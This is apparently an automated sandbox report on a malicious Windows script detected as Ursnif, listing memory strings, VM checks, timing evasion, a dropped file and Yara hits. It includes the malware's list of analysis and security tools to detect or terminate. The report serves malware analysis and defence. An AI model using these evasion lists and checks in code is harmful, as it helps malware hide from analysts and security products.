Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXE@T
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: WINDUMP.EXE@
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE@
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: NETSNIFFER.EXE@K
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE
Source: wscript.exe, 00000000.00000002.250885232.000002053E1D4000.00000004.00000001.sdmp	Binary or memory string: CARGILL = ARRAY("FRIDA-WINJECTOR-HELPER-64.EXE","FRIDA-WINJECTOR-HELPER-32.EXE","PYTHONW.EXE","PYW.EXE","CMDVIRTH.EXE","ALIVE.EXE","FILEWATCHERSERVICE.EXE","NGVMSVC.EXE","SANDBOXIERPCSS.EXE","ANALYZER.EXE","FORTITRACE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXECKSA@

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\wscript.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\wscript.exe TID: 5752

Thread sleep time: -30000s >= -30000s

Jump to behavior

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor

Checks the free space of harddrives

Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior

Enumerates the file system

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: wscript.exe, 00000000.00000002.254514322.0000020544530000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.254514322.0000020544530000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.254514322.0000020544530000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.254267241.0000020541BD9000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000002.254514322.0000020544530000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: magnesia.xcodeproj.0.dr

Jump to dropped file

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)

Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: autoruns.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000003.00000003.444347037.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444433132.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444295497.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444442868.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.445790289.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444323990.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444401752.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444370591.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444420524.0000000005458000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000003.00000003.444347037.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444433132.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444295497.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444442868.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.445790289.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444323990.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444401752.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444370591.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444420524.0000000005458000.00000004.00000040.sdmp, type: MEMORY